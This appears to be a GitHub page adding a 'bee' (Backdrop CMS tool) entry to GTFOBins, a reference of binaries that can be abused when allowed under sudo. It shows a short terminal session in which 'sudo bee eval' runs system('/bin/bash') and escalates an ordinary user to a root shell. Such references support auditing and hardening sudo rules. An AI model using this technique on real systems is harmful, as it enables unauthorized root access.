GTFOBins.github.io
GTFOBins.github.io copied to clipboard
Added bee sudo function to GTFObins
Bee sudo function added, project details below:
- https://backdropcms.org/project/bee
- https://github.com/backdrop-contrib/bee
Example:
terp@dev:/var/www/html$ whoami
terp
terp@dev:/var/www/html$ sudo bee eval "system('/bin/bash');"
root@dev:/var/www/html# whoami
root